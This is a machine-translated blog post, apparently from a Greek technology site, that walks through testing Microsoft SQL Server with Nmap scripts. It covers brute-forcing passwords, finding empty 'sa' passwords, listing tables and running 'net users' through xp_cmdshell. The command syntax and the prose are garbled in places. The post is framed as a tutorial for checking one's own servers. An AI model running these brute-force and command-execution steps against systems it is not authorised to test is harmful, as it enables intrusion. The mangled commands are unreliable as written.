SQL pen test with Nmap and Nmap script Engine

The Nmap Engine enables us to use Nmap in addition to scanner port and as a complete platform penetrationse testing.

In this post we will deal with some techniques that we can apply to one to check our S.

Generally SQL databases play by default on 1433.

By opening nmap we can give the following command:

Nmap - p1433 –script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server), the combination of nmap & Nmap Script Engine gives us information immediately about the SQL version, as well as the instance name.

nmap1

In the nmap script engine there is ms-sql-brute that will check for passwords.

nmap-2

The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we don't find anything we can also use some custom password list, the command will be if we consider that the with passwords is pass.txt.

nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt

At the same time, the nmap script engine enables us to find null passwords in infrastructures with Microsoft SQL server.

The order would be as follows

Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx

Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:

Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx

Then we will find the tables from the databases with the following command.

Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx

In older versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute operating system commands through Nmap such as.

Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx

At Continuity

Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx

We should also say that we can use nmap & nmap script engine with other tools like john the ripper. With john the ripper we can extract them  password hashes to proceed with password cracking.

 

We thank her warmly SecTeam  @johnzontos.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.087 registrants.

enginejohnNmap Script EnginePasswordscripttesting

Written by Dimitris

Dimitris hates on Mondays .....

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).